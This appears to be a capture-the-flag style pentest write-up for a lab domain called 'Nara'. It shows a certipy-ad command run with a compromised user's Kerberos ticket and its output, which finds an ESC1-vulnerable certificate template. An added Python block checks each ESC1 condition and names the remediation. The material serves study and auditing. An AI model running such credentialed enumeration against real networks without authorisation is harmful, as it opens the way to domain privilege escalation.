ADCS
ADCS is running on the nara.nara-security.com (192.168.209.30) host, which was confirmed upon the initial foothold.
Attempting to enumerate ADCS on the target system, using the TGT of the compromised tracy.white user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache certipy-ad find -vulnerable -target nara -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'NARA-CA' via RRP
[!] Failed to get CA configuration for 'NARA-CA' via RRP:
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'NARA-CA'
[*] Checking web enrollment for CA 'NARA-CA' @ 'Nara.nara-security.com'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : NARA-CA
DNS Name : Nara.nara-security.com
Certificate Subject : CN=NARA-CA, DC=nara-security, DC=com
Certificate Serial Number : 2401E520F70B7DA34C32FABC71D89E1D
Certificate Validity Start : 2023-07-30 14:06:05+00:00
Certificate Validity End : 2123-07-30 14:16:04+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates
0
Template Name : NaraUser
Display Name : NaraUser
Certificate Authorities : NARA-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : UserInteractionRequired
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-30T14:48:10+00:00
Template Last Modified : 2023-07-30T14:49:11+00:00
Permissions
Enrollment Permissions
Enrollment Rights : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Domain Users
NARA-SECURITY.COM\Enterprise Admins
Object Control Permissions
Owner : NARA-SECURITY.COM\Administrator
Full Control Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Owner Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Dacl Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Property Enroll : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Domain Users
NARA-SECURITY.COM\Enterprise Admins
[+] User Enrollable Principals : NARA-SECURITY.COM\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
A vulnerable (ESC1) certificate template was identified: NaraUser
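Why the NaraUser values above add up to ESC1, as an added audit example (not part of the original notes and not Certipy's own code). The dictionary layout, the function names and the LOW_PRIV group list are assumptions made for illustration; the flag bits and EKU OIDs are the standard AD CS template values.

```python
# Added example: ESC1 condition check. Flag values are the standard
# msPKI-* bit values; the template dict is constructed sample data.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval

# EKU OIDs that allow a certificate to be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumption: groups treated as low-privileged for this audit.
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_conditions(t):
    """Evaluate each ESC1 precondition for one template; all must hold."""
    ekus = set(t["ekus"])
    return {
        "enabled": bool(t["enabled"]),
        "enrollee_supplies_subject": bool(t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list places no usage restriction, so it counts as auth-capable.
        "authentication_eku": not ekus or bool(ekus & AUTH_EKUS),
        "no_manager_approval": not t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signatures": t["ra_signatures"] == 0,
        "low_priv_can_enroll": bool(LOW_PRIV & set(t["enroll_principals"])),
    }


def is_esc1(t):
    """True only when every precondition is met."""
    return all(esc1_conditions(t).values())


# Constructed from the NaraUser values in the output above.
NARA_USER = {
    "enabled": True,
    "name_flag": 0x1,          # EnrolleeSuppliesSubject
    "enrollment_flag": 0x108,  # UserInteractionRequired (0x100) | PublishToDs (0x8)
    "ekus": ["1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4", "1.3.6.1.5.5.7.3.2"],
    "ra_signatures": 0,        # Authorized Signatures Required
    "enroll_principals": ["Domain Admins", "Domain Users", "Enterprise Admins"],
}

if __name__ == "__main__":
    for name, met in esc1_conditions(NARA_USER).items():
        print(f"{name:28} {met}")
    print("ESC1:", is_esc1(NARA_USER))
    # Requiring manager approval (0x2) breaks the chain; UserInteractionRequired does not.
    print("ESC1 with approval required:", is_esc1(dict(NARA_USER, enrollment_flag=0x10A)))
```

Any single condition turning False clears the finding, which is why removing Domain Users from the enrollment rights or unsetting EnrolleeSuppliesSubject on the template is sufficient remediation.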
Moving on to the Privilege Escalation phase.